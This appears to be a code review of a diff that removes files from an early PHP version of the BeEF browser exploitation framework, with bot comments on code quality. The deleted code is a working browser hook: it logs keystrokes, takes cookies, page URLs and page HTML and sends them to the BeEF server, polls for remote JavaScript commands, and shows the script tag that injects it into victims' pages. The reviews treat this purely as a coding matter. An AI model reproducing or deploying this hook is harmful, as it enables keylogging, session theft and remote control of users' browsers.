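Review bot: `align: center;` in the `body` rule is not a CSS property and is discarded by the parser. If the page is meant to be centred, use `margin-left: auto; margin-right: auto;` on the fixed-width body; otherwise remove the line. The new `#beefheading a` rule repeats the declarations of `#sidebar a:link` verbatim and could share one rule with a combined selector.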

View File

@@ -1,22 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
// location of auto run file
$autorun_file = AUTORUN_TMP_DIR . AUTORUN_TMP_FILENAME;
// that auto run been set
if(!file_exists($autorun_file)) { return ""; }
// set up the return_id, session and get the code
$code = module_code_and_result_setup($autorun_file);
echo $code;
?>
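Review bot: This endpoint echoes module code without setting a Content-Type, although the hook script loads `/hook/autorun.js.php` through a script element; add `header('Content-Type: text/javascript; charset=utf-8');` as the hook file does. The early exit `if(!file_exists($autorun_file)) { return ""; }` returns a value from file scope, where it is ignored; `exit;` states the intent. The comment `// that auto run been set` is garbled and should say that the check is for an autorun file having been set.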

View File

@@ -1,161 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
require_once("../include/hook.inc.php");
header('Content-Type: text/javascript; charset=utf-8');
session_name(SESSION_NAME);
session_start();
$browser = browser($_SERVER['HTTP_USER_AGENT']);
beef_log("", $_SERVER['REMOTE_ADDR']);
$browser_details = $browser['name'] . " " . $browser['version'] . " - " . extract_os();
beef_log("Zombie connected: " . $browser_details, $browser_details);
beef_log("", $_SERVER['HTTP_USER_AGENT']);
?>
top.document.onkeypress = catch_key;
if (window.attachEvent)
window.attachEvent('onload', beef_onload);
else if (window.addEventListener)
window.addEventListener('load', beef_onload, 0);
beef_url = "<?php echo BEEF_DOMAIN; ?>";
// ---[ IS_XUL_CHROME
// determing if we are in chrome (privileged browser zone)
function isXULChrome() {
try {
// check if this is a standard HTML page or a different document (e.g. XUL)
// if that is undefined, then catch() will be executed
var dummy = document.body.innerHTML;
return false;
} catch(e) {
// if we get here, that means head is undefined so probably not an HTML doc
return true;
}
}
// ---[ BEEF_ONLOAD
function beef_onload() {
return_result('loc', document.location);
return_result('cookie', document.cookie);
if( ! isXULChrome() ) {
save_page();
}
}
var key_history = new Array(4);
var magic_seq = ['B','e','E','F'];
// ---[ SAVE_PAGE
function save_page() {
var a = document.body.innerHTML;
var begin = 0;
var block_size = 1000;
while (a.length > begin) {
return_result('html', a.substring(begin,begin+block_size));
begin = begin+block_size;
}
}
// ---[ CATCH_KEY
function catch_key(e) {
var keynum;
if(window.event) { // IE
keynum = event.keyCode;
} else if(e.which) { // Netscape/Firefox/Opera
keynum = e.which;
} else {
//TODO handle error
return 0;
}
var keychar = String.fromCharCode(keynum);
// keep key history
for(i=0;i<3;i++) {
key_history[i] = key_history[i+1];
}
key_history[3] = keychar;
// check if history is magic_seq
var escape_beef = true;
for(i=0;i<4;i++) {
if(key_history[i] != magic_seq[i]){
escape_beef = false;
}
}
if(escape_beef) {
alert('Controlled by BeEF - http://www.bindshell.net');
}
// return key to beef
return_result('kl', keychar);
}
var sw = screen.width;
var sh = screen.height;
var sd = screen.colorDepth;
return_result('screen', sw+ "x" +sh+ " with " +sd+ "-bit colour");
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<?php echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
// ---[ INCLUDE
function include(script_filename) {
if( ! isXULChrome() ) {
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = script_filename;
js.type = 'text/javascript';
js.defer = true;
html_doc.appendChild(js);
return js;
} else {
//top/root XUL elements are: window, dialog, overlay, wizard, prefwindow, page, wizard
var xul_doc;
if ((xul_doc=document.getElementsByTagName('window')[0]) || (xul_doc=document.getElementsByTagName('page')[0]) || (xul_doc=document.getElementsByTagName('dialog')[0]) || (xul_doc=document.getElementsByTagName('overlay')[0]) || (xul_doc=document.getElementsByTagName('wizard')[0]) || (xul_doc=document.getElementsByTagName('prefwindow')[0])) {
var js = document.createElementNS("http://www.w3.org/1999/xhtml","html:script");
js.setAttribute("src", script_filename);
js.setAttribute("type", "text/javascript");
js.setAttribute("defer", "true");
xul_doc.appendChild(js);
return js;
}
}
}
// start heartbeat
setInterval(function () {
var date = new Date().getTime();
include(beef_url + '/hook/command.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
}, 5000);
// run autorun module
// need setTimeout as the DOM element that is grabbed by include() function is not yet there
// our injection may occur before the element is created within the DOM
setTimeout(function () {
var date = new Date().getTime();
include(beef_url + '/hook/autorun.js.php?BeEFSession=<?php echo session_id(); ?>&time=' + date);
}, 2000);
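
Review bot: in catch_key() both loops use `i` without `var` (`for(i=0;i<3;i++)` and `for(i=0;i<4;i++)`), so the script creates a global `i` in whatever page loads it; declare the counter locally. return_result() also encodes with escape(), which does not produce percent-encoded UTF-8 for non-ASCII characters, so encodeURIComponent() is the better fit, and the `//TODO handle error` branch in catch_key() is still unimplemented.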

View File

@@ -1,35 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/hook.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat - write the heartbeat details to file
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if no command return empty file
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
if(!file_exists($zombie_hook_cmd_file)) { return ""; }
// get the command from $zombie_hook_cmd_file
$code = module_code_and_result_setup($zombie_hook_cmd_file);
// to ensure the code is exec only one delete the file
unlink($zombie_hook_cmd_file);
echo $code;
?>
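
Review bot: the file_exists() check, the read in module_code_and_result_setup() and the unlink() of $zombie_hook_cmd_file are three separate steps, so two overlapping heartbeat requests from one session can both pass the check and both return the command, which contradicts the "exec only one" comment. Renaming the file to a unique name before reading it would make the hand-off atomic. The mkdir() result is also unchecked, so a failure only shows up later at file_put_contents().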

View File

@@ -1,23 +0,0 @@
<?php
require_once("../include/config.inc.php");
?>
<html>
<head>
<title>BeEF Test Page</title>
<link rel="stylesheet" type="text/css" href="../css/firefox/style.css">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>
<body>
<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
<script language='Javascript' src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
The following code needs to be included in the zombie:<br>
<code>
&#x3C;script language='Javascript'
src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php'&#x3E;&#x3C;/script&#x3E;
</code>
<br>
</body>
</html>
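
Review bot: the snippet shown inside <code> opens the src attribute with a double quote and closes it with a single quote (`src="...hook/beefmagic.js.php'`), so anyone who copies it verbatim gets a broken script tag; the live tag two lines above quotes it correctly. BEEF_DOMAIN is also echoed into an attribute and into page text without htmlspecialchars().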

View File

@@ -1,29 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
?>
onload = beef_onload;
beef_url = "<?php echo BEEF_DOMAIN; ?>";
function beef_onload() {
raw_imap_output=document.body.innerHTML;
pos=raw_imap_output.indexOf('__END__');
result=raw_imap_output.substring(pos+18, raw_imap_output.length);
result=result.replace(/\n/g,"CR");
return_result(result_id, result);
}
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
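
Review bot: beef_onload() never checks the result of `indexOf('__END__')`; when the marker is absent `pos` is -1 and `substring(pos+18, ...)` silently returns page content from offset 17 onward. Return early on -1, and replace the bare 18 with a named constant or derive it from the marker so the offset is explained. raw_imap_output, pos and result are also assigned without `var` and become globals.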

View File

@@ -1,29 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
?>
onload = beef_onload;
beef_url = "<?php echo BEEF_DOMAIN; ?>";
function beef_onload() {
raw_imap_output=document.body.innerHTML;
pos=raw_imap_output.indexOf('__END__');
result=raw_imap_output.substring(pos+37, raw_imap_output.length);
result=result.replace(/\n/g,"CR");
return_result(result_id, result);
}
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
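
Review bot: this file is identical to the preceding one on this page except for the offset in `substring(pos+37, ...)` versus `pos+18`, so the two should be one script that takes the offset as a parameter. It carries the same unchecked `indexOf('__END__')` result, where a missing marker gives pos = -1 and returns unrelated page content.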

View File

@@ -1,95 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/common.inc.php");
session_name(SESSION_NAME);
session_start();
check_zombie_dir();
// check parameters
if(!isset($_GET["action"])) beef_error('no action');
if(!isset($_GET["data"])) beef_error('no data');
// set params
$action = $_GET["action"];
$data = $_GET["data"];
// check if the data is results from a module
if(isset($_SESSION[$action])) {
// make time stamp
$time = time();
$time_html = '<b>' . date("F j, Y, g:i a", $time) . '</b>';
$encoded_data = html_encode_all($data);
$encoded_data = convert_10_br($encoded_data);
file_put_contents($_SESSION[$action], $time_html . "<br>\n", FILE_APPEND);
file_put_contents($_SESSION[$action], $encoded_data . "<br>\n", FILE_APPEND);
// the data will be encoded in beef_log()
beef_log("Module Result: \n" . $data, "Module Result: \n" . $data);
exit;
}
// take action based on the action param
switch ($action) {
case "kl": // key registered
append_data(KEYLOG_FILENAME, $data);
break;
case "screen": // screen details
save_data(SCREEN_FILENAME, $data);
beef_log("", "Screen: " . $data);
break;
case "html": // html details
$stripped_data = stripslashes($data);
append_data(HTML_FILENAME, $stripped_data);
beef_log("", "HTML Contents: " . $stripped_data);
break;
case "cookie": // cookie details
save_data(COOKIE_FILENAME, $data);
beef_log("", "Cookie: " . $data);
break;
case "loc": // location details
save_data(LOC_FILENAME, $data);
beef_log("", "Requested URL: " . $data);
break;
default: // unexpected
beef_error("unknown action: $action");
beef_log("", "Unknown Action: " . $action);
}
// --[ CHECK_ZOMBIE_DIR
function check_zombie_dir() {
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_dir)) {
mkdir($zombie_dir);
}
}
// --[ APPEND_DATA
function append_data($filename, $data) {
if (empty($data)) { beef_error('no data to save - append data'); };
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_data_file = $zombie_dir . "/" . $filename;
file_put_contents($zombie_data_file, $data, FILE_APPEND);
}
// --[ SAVE_DATA
function save_data($filename, $data) {
if (empty($data)) { beef_error('no data to save - write data'); };
$zombie_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_data_file = $zombie_dir . "/" . $filename;
file_put_contents($zombie_data_file, $data);
}
?>
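
Review bot: `$action` comes straight from `$_GET` and is used as a `$_SESSION` key in `if(isset($_SESSION[$action]))`, so any key that happens to be set in the session, not only a result id, selects the path passed to file_put_contents(). Check that `$action` has the result-id format before the lookup. In the default branch of the switch, beef_log() follows beef_error(), which as defined in common.inc.php ends in exit, so the "Unknown Action" log line is never written; swap the two calls.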

Binary file not shown.

View File

@@ -1,237 +0,0 @@
<?php
// Hit/Log tracker with Browser Lookup support.
// Browser Lookup by Geoffrey Sneddon, with some help from Clayton Smith.
// Rest of the script by Jordan S. C. Thompson (Hendee).
// Released under the zlib/libpng license.
// December 15, 2005
// This file's code should either be placed in the file you want it displayed or include it.
// If you include be sure to specify where the log files are in $dir.
// EXAMPLE OUTPUT
// Browser: Internet Explorer
// Browser Version: 6.0
// Operating System: Windows 98
// Internet Service Provider: Juno
// Site Hits: 65,485,455
$dir = "./";
$counterDB = "hits.dat";
$logDB = "log.dat";
$currentPage = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
function browser($ua)
{
if (preg_match('/bot/i', $ua) || preg_match('/crawl/i', $ua) || preg_match('/yahoo\!/i', $ua))
{
$return['name'] = 'Bot';
$return['version'] = 'Unknown';
}
elseif (preg_match('/opera/i', $ua))
{
preg_match('/Opera(\/| )([0-9\.]+)(u)?(\d+)?/i', $ua, $b);
$return['name'] = 'Opera';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/msie/i', $ua))
{
preg_match('/MSIE ([0-9\.]+)(b)?/i', $ua, $b);
$return['name'] = 'Internet Explorer';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/omniweb/i', $ua))
{
preg_match('/OmniWeb\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'OmniWeb';
if (isset($b[1]))
$return['version'] = $b[1];
else
$return['version'] = 'Unknown';
}
elseif (preg_match('/icab/i', $ua))
{
preg_match('/iCab\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'iCab';
$return['version'] = $b[1];
}
elseif (preg_match('/Chrome/i', $ua))
{
$return['name'] = 'Chrome';
preg_match('/Chrome\/([0-9\.]+)/i', $ua, $b);
$return['version'] = $b[1];
}
elseif (preg_match('/safari/i', $ua))
{
preg_match('/Safari\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Safari';
$return['version'] = $b[1];
switch ($return['version'])
{
case '412':
case '412.2':
case '412.2.2':
$return['version'] = '2.0';
break;
case '412.5':
$return['version'] = '2.0.1';
break;
case '416.12':
case '416.13':
$return['version'] = '2.0.2';
break;
case '100':
$return['version'] = '1.1';
break;
case '100.1':
$return['version'] = '1.1.1';
break;
case '125.7':
case '125.8':
$return['version'] = '1.2.2';
break;
case '125.9':
$return['version'] = '1.2.3';
break;
case '125.11':
case '125.12':
$return['version'] = '1.2.4';
break;
case '312':
$return['version'] = '1.3';
break;
case '312.3':
case '312.3.1':
$return['version'] = '1.3.1';
break;
case '85.5':
$return['version'] = '1.0';
break;
case '85.7':
$return['version'] = '1.0.2';
break;
case '85.8':
case '85.8.1':
$return['version'] = '1.0.3';
break;
}
}
elseif (preg_match('/konqueror/i', $ua))
{
preg_match('/Konqueror\/([0-9\.]+)(\-rc)?(\d+)?/i', $ua, $b);
$return['name'] = 'Konqueror';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/Flock/i', $ua))
{
preg_match('/Flock\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Flock';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firebird/i', $ua))
{
preg_match('/Firebird\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firebird';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/phoenix/i', $ua))
{
preg_match('/Phoenix\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Phoenix';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/firefox/i', $ua))
{
preg_match('/Firefox\/([0-9\.]+)(\+)?/i', $ua, $b);
$return['name'] = 'Firefox';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/chimera/i', $ua))
{
preg_match('/Chimera\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Chimera';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/camino/i', $ua))
{
preg_match('/Camino\/([0-9\.]+)(a|b)?(\d+)?(\+)?/i', $ua, $b);
$return['name'] = 'Camino';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/seamonkey/i', $ua))
{
preg_match('/SeaMonkey\/([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'SeaMonkey';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/galeon/i', $ua))
{
preg_match('/Galeon\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Galeon';
$return['version'] = $b[1];
}
elseif (preg_match('/epiphany/i', $ua))
{
preg_match('/Epiphany\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Epiphany';
$return['version'] = $b[1];
}
elseif (preg_match('/mozilla\/5/i', $ua) || preg_match('/gecko/i', $ua))
{
preg_match('/rv(:| )([0-9\.]+)(a|b)?/i', $ua, $b);
$return['name'] = 'Mozilla';
unset($b[0], $b[1]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/mozilla\/4/i', $ua))
{
preg_match('/Mozilla\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Netscape';
$return['version'] = $b[1];
}
elseif (preg_match('/lynx/i', $ua))
{
preg_match('/Lynx\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Lynx';
$return['version'] = $b[1];
}
elseif (preg_match('/links/i', $ua))
{
preg_match('/Links \(([0-9\.]+)(pre)?(\d+)?/i', $ua, $b);
$return['name'] = 'Links';
unset($b[0]);
$return['version'] = implode('', $b);
}
elseif (preg_match('/curl/i', $ua))
{
preg_match('/curl\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'cURL';
$return['version'] = $b[1];
}
elseif (preg_match('/wget/i', $ua))
{
preg_match('/Wget\/([0-9\.]+)/i', $ua, $b);
$return['name'] = 'Wget';
$return['version'] = $b[1];
}
else
{
$return['name'] = 'Unknown';
$return['version'] = 'Unknown';
}
return $return;
}
?>
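
Review bot: most branches read `$b[1]` without checking that the second preg_match() matched (iCab, Chrome, Safari, Galeon, Epiphany, Netscape, Lynx, cURL, Wget), while only the OmniWeb branch guards it with isset(). The first test in each branch is looser than the second (`/curl/i` versus `/curl\/([0-9\.]+)/i`), so a User-Agent that contains the name without a version raises an undefined-offset notice and returns a null version. Apply the OmniWeb pattern everywhere and fall back to 'Unknown'.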

View File

@@ -1,24 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
if(!file_exists('../include/config.inc.php')
&& !file_exists('../../include/config.inc.php')
&& !file_exists('../../../include/config.inc.php')) {
$install_url = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
if(valid_url_without_query($install_url)) {
echo "<script>location.href = '" . $install_url . "..'</script>";
echo '<li><a href="..">Configure BeEF</a></li>';
} else {
echo 'Install and configure BeEF first';
}
exit(0);
}
?>
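
Review bot: `$install_url . ".."` only resolves to the parent directory when REQUEST_URI ends in a slash; for a request that ends in a file name the redirect target becomes `.../file.php..`. A relative `location.href = '..'`, as the fallback link already uses, avoids this and removes the need to build a URL from SERVER_NAME and REQUEST_URI and echo it into a script block.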

View File

@@ -1,157 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
// --[ BEEF_JS_ERROR
function beef_js_error($str) {
echo('<script>alert("' . $str . '")</script>');
}
// ---[ GET_B64_FILE
// returns the contents of a file in base64
function get_b64_file($file) {
$raw = file_get_contents($file);
$result = base64_encode($raw);
return $result;
}
// --[ BEEF_ERROR
function beef_error() {
echo ERROR_GENERIC;
exit;
}
// --[ GET_LOG
// returns the log file
function get_log() {
$raw = file_get_contents(LOG_FILE);
$log_data = "";
$log_data = html_encode_all($raw);
$log_data = convert_10_BR($log_data);
return $log_data;
}
// --[ GET_LOG
// returns the log file
function get_summary_log() {
$raw = file_get_contents(SUMMARY_LOG_FILE);
return $raw;
}
function convert_10_BR($str) {
return preg_replace('/&#10;/', "<br>", $str);
}
// --[ HTML_ENCODE_ALL
// html encodes all characters
function html_encode_all($str) {
$rtnstr = "";
$strlength = strlen($str);
for($i = 0; $i < $strlength; $i++){
$rtnstr .= "&#" . ord($str[$i]) . ";";
}
return $rtnstr;
}
// --[BEEF_LOG
// log an entry to the beef log
function beef_log($summary, $str) {
// below includes session info - for nat'ed browsers
$time_stamp = date("d/m/y H:i:s", time());
$zombie_id = md5(session_id());
// create full log
$log_entry = "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "] " . $str;
file_put_contents(LOG_FILE, $log_entry . "\n", FILE_APPEND);
//create summary log
if($summary != "") {
$time_stamp_link = "<a href=\"javascript:change_zombie('" . md5(session_id()) . "')\">" ;
$time_stamp_link .= "[" . $time_stamp . " " . $_SERVER['REMOTE_ADDR'] . "]</a>";
$safe_summary = html_encode_all($summary);
$safe_summary = convert_10_BR($safe_summary);
$log_entry = $time_stamp_link . "<br>" . $safe_summary;
file_start_put_contents(SUMMARY_LOG_FILE, $log_entry . "<br>");
}
}
function file_start_put_contents($file, $contents) {
$temp = tempnam(TMP_DIR, "delme");
touch($temp);
file_put_contents($temp, $contents, FILE_APPEND);
$raw = file_get_contents($file);
file_put_contents($temp, $raw, FILE_APPEND);
unlink($file);
copy($temp, $file);
unlink($temp);
}
if (!function_exists('file_put_contents')) {
define('FILE_APPEND', 1);
function file_put_contents($n, $d, $flag = false) {
$mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === false) {
return 0;
} else {
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
// --[ MODULE_CODE_AND_RESULT_SETUP
// this sets up session details for the return of the results and
// constructs the code
function module_code_and_result_setup($cmd_file) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
$zombie_hook_res_loc_file = $zombie_hook_dir . "/" . RES_LOC_FILENAME;
// set the location of the results file in the session
$result_id = md5(rand());
$_SESSION[$result_id] = $zombie_hook_res_file;
// determine where to put the results
if(file_exists($zombie_hook_res_loc_file)) {
$res_loc_arr = file($zombie_hook_res_loc_file);
$_SESSION[$result_id] = MODULE_TMP_DIR . $res_loc_arr[0];
$_SESSION['append'] = 1;
unlink($zombie_hook_res_loc_file);
} else {
$_SESSION[$result_id] = $zombie_hook_res_file;
$_SESSION['append'] = 0;
}
// get the javascript command file
$cmd_file_content = file_get_contents($cmd_file);
// return javascript string to set result_id
$js_result_id_code ="var result_id = '$result_id';\n";
return $js_result_id_code . $cmd_file_content;
}
?>
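
Review bot: beef_error() is declared without parameters and always prints ERROR_GENERIC, yet callers on this page pass messages such as 'no action' and 'zombie not in session', which are silently dropped; accept the message and log it. file_start_put_contents() also does unlink($file) followed by copy($temp, $file) with no locking, so concurrent requests can lose summary entries, and it calls file_get_contents($file) without checking that the file exists. The `// --[ GET_LOG` comment above get_summary_log() is a copy of the one above get_log().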

View File

@@ -1,26 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
function valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP);
}
function valid_port($port) {
$int_options = array("options"=>array("min_range"=>0, "max_range"=>65535));
return filter_var($port, FILTER_VALIDATE_INT, $int_options);
}
function valid_url($url) {
if( preg_match("/\.\./", $url) ) return FALSE;
if( ! preg_match("/^[\-a-zA-Z0-9\._:\/~]*$/", $url) ) return FALSE;
return filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
}
function valid_url_without_query($url) {
if(filter_var($url, FILTER_FLAG_QUERY_REQUIRED)) return FALSE;
return valid_url($url);
}
?>
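
Review bot: in valid_url_without_query(), `filter_var($url, FILTER_FLAG_QUERY_REQUIRED)` passes a flag constant in the filter-id position, so it does not test for a query string at all. The intended call is filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED). The character whitelist in valid_url() has no `?`, so queries are rejected there anyway, but the check should either be fixed or removed. valid_port() also accepts 0 because min_range is 0.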

View File

@@ -1,112 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// if check_install.inc.php works this should exist
require_once("check_install.inc.php");
require_once("config.inc.php");
// files and directories
// module
define('MODULE_DIR', BASE_DIR . "modules/");
define('MODULE_STANDARD_SUBDIR', "standard");
define('MODULE_BROWSER_SUBDIR', "browser");
define('MODULE_NETWORK_SUBDIR', "network");
define('MODULE_INTERPROTOCOL_SUBDIR', "interprotocol");
define('MODULE_STANDARD_DIR', MODULE_DIR . MODULE_STANDARD_SUBDIR . "/");
define('MODULE_BROWSER_DIR', MODULE_DIR . MODULE_BROWSER_SUBDIR . "/");
define('MODULE_NETWORK_DIR', MODULE_DIR . MODULE_NETWORK_SUBDIR . "/");
define('MODULE_INTERPROTOCOL_DIR', MODULE_DIR . MODULE_INTERPROTOCOL_SUBDIR . "/");
// temp
define('TMP_DIR', BASE_DIR . "cache/");
define('ZOMBIE_TMP_DIR', TMP_DIR . "zombies/");
define('AUTORUN_TMP_DIR', TMP_DIR . "autorun/");
define('MODULE_TMP_DIR', TMP_DIR . "modules/");
define('AUTORUN_TMP_FILENAME', "autorun.js");
// other
define('JAVASCRIPT_DIR', BASE_DIR . "js/");
define('CMD_FILE', TMP_DIR . "cmd.js");
define('CMD_FILE_BAK', TMP_DIR . "cmd.js.bak");
define('CMD_RESULT_FILE', TMP_DIR . "cmd.res");
define('CMD_RESULT_FILE_BAK', TMP_DIR . "cmd.res.bak");
define('HEARTBEAT_FILE', TMP_DIR . "heartbeat");
define('HEARTBEAT_FILENAME', "heartbeat");
define('KEYLOG_FILENAME', "keylog");
define('SCREEN_FILENAME', "screen");
define('HTML_FILENAME', "content.html");
define('COOKIE_FILENAME', "cookie.txt");
define('LOC_FILENAME', "loc.txt");
define('RES_LOC_FILENAME', "res_loc");
define('CLIPBOARD_FILENAME', "clipboard.txt");
define('CMD_FILENAME', "cmd");
define('RES_FILENAME', "result");
define('MODULE_NAME_FILENAME', "name.txt");
define('BASE64_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64.js");
define('BASE64REPLACE_JAVASCRIPT_FILE', JAVASCRIPT_DIR . "base64replace.js");
define('HEARTBEAT_TIME', "10000");
define('HEARTBEAT_FREQUENCY', 5);
define('SUMMARY_LOG_HEARTBEAT_FREQUENCY', 3);
// session
define('SESSION_NAME', "BeEFSession");
// strings
define('DNA_STRING', "Data not available");
define('ERROR_GENERIC', "Error ");
// zombies (sidebar)
define('ZOMBIE_NONE', '<li><a href="#">None Connected</a></li>');
define('ZOMBIE_IMG_ATT', ' width="12" height="12" align="top" border="0"');
define('ZOMBIE_UA_IMG_TAG', '<img src="../images/AGENT"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_OS_IMG_TAG', '<img src="../images/OS"' . ZOMBIE_IMG_ATT . '>');
define('ZOMBIE_IP_TAG', '<div id="zombietext">IPADDRESS</div>');
define('ZOMBIE_CHANGE_HREF', '<a href="javascript:change_zombie(\'ZOMBIE\')">');
define('ZOMBIE_NOT_SEL_TAG', '<div id=\'zombies\'>');
define('ZOMBIE_SEL_TAG', '<div id=\'zombiessel\'>');
define('ZOMBIE_LINK', ZOMBIE_NOT_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('ZOMBIE_LINK_SEL', ZOMBIE_SEL_TAG . ZOMBIE_CHANGE_HREF . ZOMBIE_UA_IMG_TAG .
ZOMBIE_OS_IMG_TAG . ZOMBIE_IP_TAG . '</a></div>');
define('MODULE_BUTTON_HTML', '<input class="button" type="button" value="NAME" ' .
'onClick="change_module(\'../modules/PATH/\')"/>' . "\n");
define('MODULE_MENU_ITEM_HTML', '<li><a href="#" onClick="change_module(\'PATH\')">NAME</a></li>');
// install
define('INSTALL_WARNING_TEXT', 'ERROR: BeEF may not have been installed correctly.Edit the "' .
'define(\'BASE_DIR\', "/var/.../htdocs/beef/");' .
' line of the \'globals.inc.php\' file in the \'include\' dirrctory and point' .
' this value at the BeEf install directory.');
define('INSTALL_WARNING', '<font size="4" color="red">' . INSTALL_WARNING_TEXT . '</font>');
// agents
define('AGENT_UNKNOWN_IMG', "unknown.png");
define('AGENT_FIREFOX_UA_STR', "Firefox");
define('AGENT_FIREFOX_IMG', "firefox.png");
define('AGENT_MOZILLA_UA_STR', "Mozilla");
define('AGENT_MOZILLA_IMG', "mozilla.png");
define('AGENT_IE_UA_STR', "Internet Explorer");
define('AGENT_IE_IMG', "msie.png");
define('AGENT_SAFARI_UA_STR', "Safari");
define('AGENT_SAFARI_IMG', "safari.png");
define('AGENT_KONQ_UA_STR', "Konqueror");
define('AGENT_KONQ_IMG', "konqueror.png");
define('AGENT_CHROME_UA_STR', "Chrome");
define('AGENT_CHROME_IMG', "chrome.png");
// os'es
define('OS_UNKNOWN_IMG', "unknown.png");
define('OS_WINDOWS_UA_STR', "Windows");
define('OS_WINDOWS_IMG', "win.png");
define('OS_LINUX_UA_STR', "Linux");
define('OS_LINUX_IMG', "linux.png");
define('OS_MAC_UA_STR', "Mac");
define('OS_MAC_IMG', "mac.png");
?>
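
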